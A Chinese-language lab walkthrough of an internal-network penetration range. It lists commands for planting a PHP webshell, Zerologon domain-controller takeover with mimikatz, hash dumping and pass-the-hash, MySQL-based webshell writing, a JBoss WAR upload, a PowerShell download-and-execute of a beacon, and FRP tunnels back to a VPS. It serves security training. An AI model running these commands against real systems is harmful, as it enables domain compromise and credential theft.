综合环境靶场攻击过程记录(内网域森林+服务森林)上篇
字数 1932 2025-08-13 21:33:27
综合内网渗透靶场实战教学文档
环境概述
本靶场是一个大型综合内网渗透环境,包含以下关键组件:
- 内网域森林结构(父域、子域、安全域)
- 多种服务框架(Yxcms、JBoss等)
- 数据库系统(MySQL)
- 中间件(Tomcat等)
- 多级代理架构(FRP一级、二级、三级代理)
初始访问
代理设置
-
Proxifier配置:
- 设置SOCKS5代理:
10.x.xxx.xxx:60300、10.x.xxx.xxx:60255、10.x.xxx.xxx:60254 - 连接成功后,修改本地hosts文件添加:
192.168.x.x www.dayugs.com
- 设置SOCKS5代理:
-
访问靶场:
- 通过浏览器访问:
http://www.dayugs.com/
- 通过浏览器访问:
Web服务器渗透(Yxcms 1.2.1)
1. 获取Webshell
-
管理员登录爆破:
- 访问:
http://www.dayugs.com/index.php?r=admin - 验证码无防护机制,直接爆破获得密码:
123456
- 访问:
-
写入一句话木马:
- 进入"前台模板"->"管理模板文件",编辑
index_index.php,插入:<?php @eval($_POST['yyds']);?>
- 进入"前台模板"->"管理模板文件",编辑
-
蚁剑连接:
- URL:
http://www.dayugs.com/index.php - 密码:
yyds
- URL:
2. 上线Cobalt Strike
-
系统信息收集:
- 执行
systeminfo确认系统为Windows 7专业版64位
- 执行
-
生成并上传木马:
- CS生成Windows 64位可执行木马
- 通过蚁剑上传到Web服务器并执行
-
提权(MS14-058):
- 使用CS内置提权模块,选择MS14-058漏洞
3. Web服务器信息收集
-
网络配置:
ifconfig /all- 双网卡:
- Web:
192.168.73.137 - 域:
10.10.10.101
- Web:
- 域控:
10.10.10.10 - 域名:
ziyu.dayu.com
- 双网卡:
-
内网扫描:
nbtscan 10.10.10.1/24发现多个域控制器Cscan.exe 10.10.10.1/24检测MS17-010漏洞
子域控攻击(CVE-2020-1472)
1. Zerologon漏洞利用
-
漏洞检测:
mimikatz "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$" "exit"- 确认存在漏洞(Authentication: OK -- vulnerable)
-
执行置零攻击:
mimikatz "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$ /exploit" "exit"
2. 建立一级代理
-
FRP配置:
- 靶机配置(
frpc.ini):[common] server_addr = 1.xxx.xxx.xx4 server_port = 11608 [http_proxy] type = tcp remote_port = 11668 plugin = socks5 - VPS配置(
frps.ini):[common] bind_addr = 0.0.0.0 bind_port = 11608
- 靶机配置(
-
启动代理:
- VPS执行:
frps.exe -c frps.ini - 靶机执行:
frpc.exe -c frpc.ini
- VPS执行:
-
Proxychains设置:
1.xxx.xxx.xx4 11668
3. 获取域控Hash
proxychains impacket-secretsdump -no-pass -just-dc ziyu.dayu.com/ZIYU\$@10.10.10.10
- 获取Administrator的NTLM hash:
a8ad79b7b2c6598658ca0932cbf01e40
4. 横向移动上线CS
- 使用wmiexec.py:
wmiexec.exe -hashes :a8ad79b7b2c6598658ca0932cbf01e40 ./Administrator@10.10.10.10 - 上传并执行木马:
- 上传
ch4nge2.exe - 执行木马上线
- 上传
5. 恢复原始Hash
-
导出注册表:
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save -
下载并解析Hash:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL -
恢复密码:
proxychains python3 reinstall_original_pw.py ZIYU 10.10.10.10 6dad47c8a130fc93b0bf4181d7269afc
父域控攻击
1. Zerologon攻击
-
检测并利用:
mimikatz "lsadump::zerologon /target:10.10.10.5 /account:WIN-AMJ9T9TL123$" "exit" mimikatz "lsadump::zerologon /target:10.10.10.5 /account:WIN-AMJ9T9TL123$ /exploit" "exit" -
获取Hash:
proxychains impacket-secretsdump -no-pass -just-dc dayu.com/WIN-AMJ9T9TL123\$@10.10.10.5
安全域攻击(10.10.10.66)
1. 信息收集
- 端口扫描:
fscan.exe -h 10.10.10.66 -p 1-65535- 发现Tomcat 8.5.65、phpStudy等服务
2. MySQL弱口令利用
-
写Webshell:
select '<?php @eval($_POST[yyds]);?>' into outfile 'C:/phpStudy/WWW/cc.php'; -
日志文件写Shell:
set global general_log = "ON"; set global general_log_file='C:/phpStudy/WWW/cch4nge.php'; select '<?php @eval($_POST[yyds]);?>';
JBoss攻击(10.10.10.90)
1. 弱口令登录
- URL:
http://10.10.10.90:8080/admin-console/login.seam - 凭证:
admin/admin
2. 上传War木马
-
制作War包:
- 将JSP Webshell压缩为ZIP,重命名为.war
-
部署War包:
- 通过"Add a new resource"上传
3. 上线CS
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://10.10.10.101/ch4nge2.exe','ch4nge2.exe');start-process ch4nge2.exe
涉密系统攻击(201.1.10.206)
1. MySQL弱口令利用
- 写Webshell:
select '<?php @eval($_POST[yyds]);?>' into outfile 'C:/phpStudy/WWW/cc2.php';
多级代理架构
1. 二级代理配置(Web-安全域)
-
VPS配置:
[common] bind_addr = 0.0.0.0 bind_port = 19831 -
Web服务器配置:
[common] bind_addr = 10.10.10.101 bind_port = 19831 [common] server_addr = 1.xxx.xxx.xx4 server_port = 19831 [http_proxy] type = tcp local_ip = 10.10.10.101 local_port = 19833 remote_port = 19833 -
安全域配置:
[common] server_addr = 10.10.10.101 server_port = 19831 [http_proxy] type = tcp remote_port = 19833 plugin = socks5
关键知识点总结
-
横向移动技术:
- Zerologon漏洞利用
- Pass-the-Hash攻击
- WMIExec横向移动
-
权限维持:
- Webshell上传
- 持久化后门部署
-
代理隧道:
- FRP多级代理搭建
- Proxychains配置使用
-
信息收集:
- 内网主机发现
- 服务识别
- 漏洞扫描
-
提权技术:
- MS14-058本地提权
- 域管理员权限获取
-
数据库攻击:
- MySQL写Webshell
- 日志文件Getshell
-
中间件攻击:
- JBoss弱口令利用
- War包部署